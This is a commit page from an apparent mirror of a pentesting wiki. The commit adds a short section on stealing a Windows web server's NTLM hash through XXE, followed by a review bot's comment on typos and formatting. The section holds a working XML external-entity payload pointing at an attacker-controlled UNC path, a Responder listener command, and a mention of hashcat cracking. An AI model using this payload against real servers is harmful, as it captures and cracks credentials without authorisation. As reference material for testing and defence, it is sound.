mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
Updated XXE attacks by adding NTLM
Updated XXE attacks by adding a method to get NTLM hash on Windows hosts
This commit is contained in:
parent
06e3bda49a
commit
e3c2d3ed88
1 changed files with 19 additions and 0 deletions
@ -423,6 +423,25 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
![](<../.gitbook/assets/image (531).png>)
### Getting NTML
On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:
```
Responder.py -I eth0 -v
```
and by sending the following request
```
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>
```
Then you can try to crack the hash using hashcat
# Hidden XXE Surfaces
## XInclude
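Review bot: the XML declaration on the first line of the request sample is wrapped in an HTML comment (`<!--?xml version="1.0" ?-->`), which reads like a copy-paste from a rendered page; it should be `<?xml version="1.0" ?>` so the snippet is a valid XML prolog. The new heading "### Getting NTML" and the sentence below it also spell the hash type as "NTML" while the commit title says NTLM; please correct both to NTLM. Minor: the two new fences carry no language tag, the closing sentence ("Then you can try to crack the hash using hashcat") is missing its full stop, and `attackerIp` in the SYSTEM entity is a placeholder that could be marked as such so readers do not take it for a literal host name.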